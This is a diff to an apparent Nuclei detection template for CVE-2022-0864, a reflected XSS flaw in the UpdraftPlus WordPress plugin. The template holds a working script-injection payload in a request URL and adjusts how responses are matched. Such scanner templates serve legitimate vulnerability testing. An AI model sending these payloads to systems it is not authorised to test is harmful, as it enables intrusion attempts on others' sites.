diff --git a/http/cves/2022/CVE-2022-0864.yaml b/http/cves/2022/CVE-2022-0864.yaml
index d48166f633..4fb14c77a7 100644
--- a/http/cves/2022/CVE-2022-0864.yaml
+++ b/http/cves/2022/CVE-2022-0864.yaml
@@ -21,8 +21,8 @@ info:
     epss-percentile: 0.62009
     cpe: cpe:2.3:a:updraftplus:updraftplus:*:*:*:*:*:wordpress:*:*
   metadata:
-    verified: true
     max-request: 2
+    verified: true
     vendor: 'updraftplus'
     product: 'updraftplus'
     framework: wordpress
@@ -37,19 +37,19 @@ http:
         Content-Type: application/x-www-form-urlencoded
 
         log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+
       - |
-        GET /wp-admin/options-general.php?page=updraftplus&updraft_interval"></script><script>confirm(document.domain)</script> HTTP/1.1
+        GET /wp-admin/options-general.php?page=updraftplus&updraft_interval"></script><script>confirm('document_domain')</script> HTTP/1.1
         Host: {{Hostname}}
 
     cookie-reuse: true
-
     matchers-condition: and
     matchers:
       - type: word
-        part: body
+        part: body_2
         words:
-          - '</script><script>confirm(document.domain)</script>'
-          - 'updraftplus'
+          - "<script>confirm('document_domain')</script>"
+          - "Existing backups"
         condition: and
 
       - type: word